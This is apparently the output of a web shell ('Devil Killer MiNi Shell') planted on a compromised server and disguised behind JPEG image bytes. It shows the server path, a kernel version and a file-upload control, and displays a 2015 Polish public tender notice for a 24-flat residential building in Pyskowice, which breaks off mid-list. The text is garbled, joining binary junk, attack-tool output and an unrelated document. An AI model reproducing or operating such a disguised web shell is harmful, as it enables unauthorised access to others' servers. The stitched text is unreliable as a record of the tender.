JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151007/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151007/265152-N-2015.html

<p class="kh_header"><b>Tarnowskie Góry: BUDOWA WIELORODZINNEGO ZESPOŁU MIESZKANIOWEGO PRZY ULICY STRZELCÓW BYTOMSKICH W PYSKOWICACH - II ETAP</b><br>
<b>Numer ogłoszenia: 265152 - 2015; data zamieszczenia: 07.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Międzygminne Towarzystwo Budownictwa Społecznego Sp. z o.o. , ul. Towarowa 1, 42-600 Tarnowskie Góry, woj. śląskie, tel. (032) 3809006, 3809031, faks (032) 380 90 18.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z ograniczoną odpowiedzialnością z 100% udziałem gmin.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BUDOWA WIELORODZINNEGO ZESPOŁU MIESZKANIOWEGO PRZY ULICY STRZELCÓW BYTOMSKICH W PYSKOWICACH - II ETAP.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest budowa jednego 24-rodzinnego budynku mieszkalnego przy ul. Strzelców Bytomskich w Pyskowicach wraz z niezbędną infrastrukturą oraz z uzyskaniem pozwolenia na użytkowanie przedmiotowego budynku. Inwestycja stanowi realizację II etapu przedsięwzięcia obejmującego budowę zespołu dwóch budynków mieszkalnych w zabudowie wielorodzinnej. Teren inwestycji zlokalizowany jest w sąsiedztwie Urzędu Miejskiego przy ul. Strzelców Bytomskich. Szczegółowy zakres infrastruktury technicznej II etapu zawierają rysunki:
I. Projekt zagospodarowania terenu - uzbrojenie terenu
II. Projekt zagospodarowania terenu - zbiorcza plansza uzbrojenia
Budynek został zaprojektowany z częściowym podpiwniczeniem, przeznaczonym na komórki gospodarcze dla mieszkańców budynku, wózkownie i suszarnie. Projektowany obiekt to budynek V kondygnacyjny z częściowym podpiwniczeniem oraz z użytkowym poziomem poddasza przeznaczony na cele mieszkalne, wielorodzinne. Budynek o konstrukcji tradycyjnej w mieszanym układzie konstrukcyjnym, ze ścianami konstrukcyjnymi murowanymi i elementami wylewanymi w szalunkach na placu budowy. Komunikację wewnętrzną obiektu zapewniają 2 klatki schodowe, oraz korytarze wewnętrzne. Zgodnie z zapisem miejscowego planu zagospodarowania przestrzennego zaprojektowano obsługę komunikacyjną obiektu w nawiązaniu do istniejącej ulicy Strzelców Bytomskich. Dojścia i dojazdy przewidziane dla obsługi mieszkańców zlokalizowane zostały od strony ulicy Strzelców Bytomskich. W poziomie piwnic ściany murowane z bloczków betonowych typu M6, ściany nadziemia (zewnętrzne, wewnętrzne konstrukcyjne i działowe) murowane z ceramicznych pustaków poryzowanych typu POROTHERM. Ściany zewnętrzne z POROTHERU 44 EKO+DRYFIT na zaprawie termicznej, ściany klatek schodowych i ściany pomiędzy mieszkaniami powinny mieć odpowiednio zwiększoną izolacyjność akustyczną. Należy zastosować pustaki z wkładką akustyczną lub pustaki o odpowiedniej grubości.  Stropy  żelbetowe typu FILIGRAN, dach drewniany krokwiowo-kleszczowy kryty dachówką ceramiczną np. Braas. Balkony żelbetowe  płytowe wspornikowe oraz żelbetowe daszki nad balkonami wykonane również w technologii stropów filigran.  Ciepła woda użytkowa i ogrzewanie z indywidualnych kotłów gazowych z zamkniętą komorą spalania zlokalizowanych  w mieszkaniach.  Miejsca parkingowe w ilości 26 zostały wykonane w I etapie i nie wchodzą w zakres II etapu.
Zakres rzeczowy zadania obejmuje:
a) budowę budynku mieszkalnego 24 rodzinnego wraz z przyległym uzbrojeniem i zagospodarowaniem terenu.
b) przyłącza wodno-kanalizacyjne, oświetlenie terenu w zakresie umożliwiającym funkcjonowanie budynku zgodnie z przeznaczeniem.
Budynek realizowany w technologii tradycyjnej z zastosowaniem elementów prefabrykowanych i monolitycznej konstrukcji poziomu piwnic. 
I. Rozwiązania konstrukcyjno-materiałowe dla budynku to:
- ławy fundamentowe żelbetowe z betonu C20/25 (B25) - XC1, stalL BST500S FYK=500MPA KLASY B (A-IIIN).,
- posadowienie segmentów mieszkalnych na żelbetowych stopach i ławach fundamentowych wylewanych na placu budowy w zakresie określonym w projekcie konstrukcyjnym,
- ściany piwnic należy wykonać jako murowane z bloczków betonowych M6 na zaprawie cementowej klasy m5 o grubości 24cm,
- ściany zewnętrzne o grubości 44 cm z pustaków ceramicznych poryzowanych szlifowanych POROTHERM 44 EKO+DRYFIX klasy 10 murowane na zaprawie cienkowarstwowej poliuretanowej do murowania na sucho Porotherm Dryfix (Aprobata techniczna  ITB AT-15-8223/2010). Współczynnik przenikania  U=0,23 W/m2K (bez tynku),
- ściany wewnętrzne konstrukcyjne z pustaków ceramicznych poryzowanych AKU 25/37, 5 klasy 20 na zaprawie cementowo-wapiennej klasy 5,
- ścianki działowe wewnętrzne z pustaków ceramicznych gr. 8-11,5 cm na zaprawie cementowo-wapiennej klasy M3,
- stropy typu FILIGRAN o łącznej grubości wraz z nadbetonem min. 18cm,
- konstrukcja dachu drewniana krokwiowo-kleszczowa. Dach kryty dachówką ceramiczną np. Braas,
- balkony żelbetowe  płytowe - wspornikowe oraz żelbetowe daszki nad balkonami wykonane w technologii stropów filigran, kotwione w stropie za pośrednictwem termicznie izolowanych łączników balkonowych schock isokorb k50-cv30-v6-h180. Balkony w narożnikach wewnętrznych  kotwione w stropie za pośrednictwem łączników balkonowych schock isokorb k30-cv30-v8-h180 oraz q10+q10-h180,
- słupy żelbetowe z betonu C20/25 (B25) - XC1 zbrojone stalą BST500S FYK=500MPA klasy B (A-IIIN). Otulina zbrojenia głównego c  nom=3cm,
- izolacja posadzki w pomieszczeniach sanitarnych (łazienka, wc),
- izolacja balkonów,
- izolacja termiczna ścian zewnętrznych,
- ceramiczne płytki podłogowe w komórkach lokatorskich, pomieszczeniach technicznych i klatce schodowej,
- ściany ciągów komunikacyjnych - tynki wewnętrzne gipsowe zatarte na gładko, dwukrotnie malowane,
- tynk mozaikowy do wysokości 1,60 m na klatkach schodowych i korytarzach,
- balkony oraz tarasy wykafelkowane oraz otynkowane od spodu,
- okna PCV z szybami o współczynniku k=1,10,
- drzwi zewnętrzne k=1,10,
- w oknach na poziomie parteru należy zastosować zamykanie na klucz,
- tynki wewnętrzne gipsowe,
- tynki zewnętrzne systemowe. Technologia wykonania przewiduje wykonanie:
a) obrzutki z zaprawy  cementowej
b) dwuwarstwowego tynku zasadniczego Porotherm TO (po 20mm) 
c) wykończeniowego tynku Porotherm Uniwersal
d) cienkowarstwowego tynku silikatowego o uziarnieniu 3 mm,
- malowanie numeru pocztowego oraz logo MTBS Sp. z o. o. na elewacji budynku,
- wewnętrzna instalacja RTV SAT, DVBT i teletechniczna  - kompletna instalacja wewnętrzna wraz z rozprowadzeniem po wszystkich lokalach mieszkalnych w budynku, kompletna antena zbiorcza przystosowana do odbioru cyfrowej telewizji naziemnej oraz cyfrowej telewizji satelitarnej, zamontowana na realizowanym budynku,
- wewnętrzna instalacja domofonowa,
- sterowanie oświetlenia na klatce schodowej czujnikami ruchu oraz czujnikami zmierzchowymi,
- ilość lamp oświetleniowych - 1 sztuka, przyłączenie zgodnie z załącznikiem nr 8 - plan zagospodarowania terenu z zakresem wykonania zewnętrznej instalacji elektrycznej,
- do każdej komórki lokatorskiej z rozdzielnic głównych w piwnicy budynku należy wykonać indywidualny obwód, który zasili instalację oświetlenia danej komórki lokatorskiej z sieci zalicznikowej lokatora. Obwód zasilania boksu należy w rozdzielnicy RG zabezpieczyć wyłącznikiem nadprądowym B10. Przewody zasilające boksy wykonać przewodem YDY 3x1,5. Obwody należy przeprowadzić na odcinku korytarza piwnicy w korytku kablowym metalowym perforowanym z pokrywą, a w komórce lokatorskiej na tynku w rurach instalacyjnych typu RL16 na tynku. Po zakończeniu realizacji należy sporządzić projekt powykonawczy instalacji zasilania komórek lokatorskich,
- należy założyć dostarczenie oraz montaż skrzynek na listy przynależnej dla każdego z mieszkań oraz jedną dla potrzeb administracyjnych, tj. 25 sztuk,
1. Dane techniczno-użytkowe projektowanego budynku.
- Powierzchnia całkowita netto budynku: 1.540,40 m2
- Powierzchnia całkowita budynku: 1.992,00 m2
- Budynek składa się w sumie z 24 mieszkań o łącznej powierzchni 1.166,60 m2, w tym:
a) 16 mieszkań 2-pokojowych o łącznej pow. 827,60 m2
b) 2 mieszkania 3-pokojowych o łącznej powierzchni 131,20 m2
c) 6 mieszkań 1-pokojowych o łącznej powierzchni 207,80 m2 
- Kubatura budynku: 5.635,00 m3
2. Przedmiotem zamówienia podstawowego objęte są następujące elementy stanu wykończeniowego lokali mieszkalnych wewnętrznego i zewnętrznego.
- tynki wewnętrzne gipsowe zatarte na gładko,
- stolarka okienna PCV, zestaw szybowy jednokomorowy o współczynniku przenikania ciepła U=1,1 W/m2K;
W oknach należy zamontować (u producenta lub na budowie) nawiewniki higrosterowane w górnym ramieniu skrzydła okiennego
- ściany przygotowane pod malowanie
- stolarka drzwiowa wewnętrzna
- drzwi wewnętrzne
3. Przedmiotem zamówienia podstawowego jest wykonanie robót wykończeniowych oraz wyposażenie lokalu mieszkalnego nr 3 /pod klucz/ zlokalizowanego na parterze o powierzchni użytkowej 46,70 m2:
- posadzki w pomieszczeniach mieszkalnych - panele podłogowe w pokojach; płytki ceramiczne z izolacją w kuchni, łazience i wc; płytki ceramiczne w przedpokoju;
- okładziny ścienne - płytki ceramiczne w kuchni, łazience i wc;
- montaż wyposażenia łazienki i wc w urządzenia sanitarne - umywalka łazienkowa z półpostumentem na stelażu, umywalka łazienkowa z postumentem na stelażu, miska ustępowa na stelażu, wanna z obudowaniem, kabina prysznicowa z obudowaniem.
W związku z powyższym dodatkowo należy podać:
- koszt położenia 1 m2 wraz zakupem materiału, posadzki w pomieszczeniach mieszkalnych:
a) panele podłogowe w pokojach; 
b) płytki ceramiczne z izolacją w kuchni, łazience i wc;
c) płytki ceramiczne w przedpokoju;
- koszt wykonania 1 m2 wraz z zakupem materiału, okładziny ściennej:
a) płytki ceramiczne w kuchni, łazience i wc.
- koszt zakupu i montażu wyposażenia łazienki i wc w urządzenia sanitarne:
a) umywalka łazienkowa z półpostumentem na stelażu;
b) umywalka łazienkowa z postumentem na stelażu;
c) miska ustępowa na stelażu;
d) wanna z obudowaniem;
e) kabina prysznicowa z obudowaniem..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielania zamówień uzupełniających zgodnie z art. 67 ust. 1 pkt. 6 ustawy Pzp w wysokości do 50% wartości całości zamówienia. Zamówienia uzupełniające będą polegać na powtórzeniu zakresu zamówienia podstawowego tj. wykonanie robót wykończeniowych oraz wyposażenie lokalu mieszkalnego nr 3 /pod klucz/ zlokalizowanego na parterze o powierzchni użytkowej 46,70 m2, w zakresie o którym mowa w Rozdziale III pkt. 1.3 siwz, na wykończenie pozostałych mieszkań.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.10.00-9, 45.33.00.00-9, 45.33.11.00-7, 45.31.00.00-3, 45.32.00.00-6, 45.42.11.00-5, 45.43.00.00-0, 45.41.00.00-4, 45.23.31.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Oferta musi być zabezpieczona wadium w wysokości: 109.000,00 zł (słownie: sto dziewięć tysięcy złotych 00/100) 
2. Wadium musi obejmować cały okres związania ofertą. 
3. Termin wniesienia wadium upływa dnia 29.10.2015 r. do godz. 1000
4. Wadium może być wnoszone w jednej lub kilku następujących formach:
- w pieniądzu;
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
- gwarancjach bankowych;
- gwarancjach ubezpieczeniowych;
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r Nr 42, poz.275 z późn.zm.).
5. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek Zamawiającego - ING Bank Śląski o/Tarnowskie Góry. 87 1050 1386 1000 0002 0085 6060 z dopiskiem /Wadium - budowa II Etap ul. Strzelców Bytomskich, Pyskowice/. Kserokopię dowodu wpłaty można dołączyć do oferty.
6. W treści wadium składanego w formie innej niż pieniądz muszą być wyszczególnione okoliczności, w jakich zamawiający może je zatrzymać. Okoliczności te muszą zawierać sytuacje określone:
1) w art. 46 ust. 4a prawa zamówień publicznych, tj. jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1  pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie, omyłki, o której mowa w art 87 ust 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.
2) w art. 46 ust. 5 prawa zamówień publicznych, tj. jeżeli wykonawca, którego oferta została wybrana:
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 
c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy. 
Ponadto z powyższego dokumentu powinno wynikać jednoznacznie gwarantowanie wypłaty należności w sposób nieodwołalny, bezwarunkowy i na pierwsze żądanie. Wadium takie powinno obejmować cały okres związania ofertą, poczynając od daty składania ofert.
7. Wadium wniesione przez jednego ze wspólników konsorcjum uważa się za wniesione prawidłowo.
8. O uznaniu przez Zamawiającego, że wadium w pieniądzu wpłacono w wymaganym terminie, decyduje data i godzina wpływu środków na rachunek Zamawiającego.
9. Wykonawca, który nie wniesie wadium do upływu terminu składania ofert, na przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust. 3 ustawy Pzp albo nie zgodzi się na przedłużenie okresu związania ofertą, zostanie wykluczony z postępowania o udzielenie zamówienia publicznego.
10. Zamawiający zatrzyma wadium wraz odsetkami w sytuacji określonej w art. 46 ust. 4a i 5 ustawy Pzp.
11. Zamawiający dokona zwrotu wadium zgodnie z warunkami określonymi w art. 46 ustawy Pzp.
12. Zamawiający zażąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium, jeżeli  w wyniku rozstrzygnięcia odwołania, jego oferta zostanie wybrana jako najkorzystniejsza. Wykonawca ten wnosi wadium w terminie określonym przez Zamawiającego.
13. Wykonawca, którego oferta została wybrana, a który wniósł wadium w pieniądzu, może wyrazić zgodę na zaliczenie kwoty wadium na poczet zabezpieczenia należytego wykonania umowy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał  co najmniej dwie roboty budowlane odpowiadające rodzajem i wartością przedmiotowi zamówienia, polegające na budowie budynku mieszkalnego wielorodzinnego zrealizowanego w technologii tradycyjnej, częściowo podpiwniczonego, co najmniej 24 rodzinnego z co najmniej czterema kondygnacjami.
Za zakończenie roboty budowlanej należy rozumieć podpisanie protokołu odbioru końcowego lub równoważnego dokumentu
W celu wykazania spełniania przez wykonawcę warunku, o którym mowa powyżej, wykonawca zobowiązany jest przedłożyć wraz z ofertą:
a) wykaz wykonanych, głównych robót budowlanych, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie,  (zgodnie załącznikiem nr 3 do Formularza Oferty) wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których roboty zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie.
UWAGA: Wystarczające będzie wskazanie w wykazie oraz złączenie dowodów dotyczących usług w liczbie i w zakresie niezbędnym do wykazania spełnienia wyżej opisanego warunku wiedzy i doświadczenia.
Dowodami o których mowa powyżej są:
1) poświadczenie, z tym że w odniesieniu do nadal wykonywanych robót ciągłych poświadczenie  powinno być wydane nie wcześniej  niż na 3 miesiące przed upływem terminu składania ofert.
2) oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej.
UWAGA: W przypadku, gdy Zamawiający - Międzygminne Towarzystwo Budownictwa Społecznego Sp. z o. o. jest podmiotem, na rzecz którego roboty budowlane wskazane w załączniku nr 3 do Formularza Oferty zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dysponowanie (dysponuje lub będzie dysponował) potencjałem technicznym w celu realizacji zamówienia tj. przynajmniej wykonanie budowy budynku w stanie surowym, zamkniętym. 
W celu wykazania spełniania przez wykonawcę warunku, o którym mowa powyżej, wykonawca zobowiązany jest przedłożyć wraz ofertą:
a) wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami - zgodnie z załącznikiem nr 5 do Formularza Oferty;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dysponowanie (dysponuje lub będzie dysponował) osobami zdolnymi do wykonania zamówienia tj.: posiadającymi aktualne uprawnienia budowlane do kierowania robotami budowlanymi w specjalności:
- konstrukcyjno-budowlanej bez ograniczeń (kierownik budowy) - 1 osoba
- instalacyjnej bez ograniczeń w zakresie sieci, instalacji i urządzeń elektrycznych oraz elektro-energetycznych (kierownik robót elektrycznych - 1 osoba
- instalacyjnej bez ograniczeń w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowo-kanalizacyjnych (kierownik robót sanitarnych) - 1 osoba
- drogowej bez ograniczeń (kierownik robót drogowych) - 1 osoba
W celu wykazania spełniania przez wykonawcę warunku, o którym mowa powyżej, wykonawca zobowiązany jest przedłożyć wraz ofertą:
a) wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia (wystarczające będzie wykazanie wyłącznie osób, o których mowa powyżej w pkt 2.3.1.), wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - zgodnie z załącznikiem nr 4 do Formularza Oferty;
b) oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane przepisami prawa uprawnienia - zawarte w załączniku nr 4 do Formularza Oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca musi wykazać, że posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 3.000.000,00 zł (słownie: trzy miliony złotych 00/100).
W celu wykazania spełniania przez wykonawcę warunków, o których  mowa powyżej, wykonawca zobowiązany jest przedłożyć wraz z ofertą:
a) informację banku lub spółdzielczej kasy oszczędnościowo - kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
2. Wykonawca musi wykazać, iż jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzenia działalności związanej z przedmiotem zamówienia w wysokości co najmniej 3.000.000,00 zł (słownie: trzy miliony złotych 00/100)
W celu wykazania spełniania przez wykonawcę warunków, o których  mowa powyżej, wykonawca zobowiązany jest przedłożyć wraz z ofertą:
a) Opłaconą polisę, w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
UWAGA: Jeżeli wykonawca wskazując spełnianie warunków, o których mowa w pkt 2.4., polega na zasobach innych pomiotów zgodnie z art. 26 ust 2b ustawy Pzp, Zamawiający wymaga przedłożenia dokumentów, o których mowa w tym punkcie, dotyczących tych podmiotów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
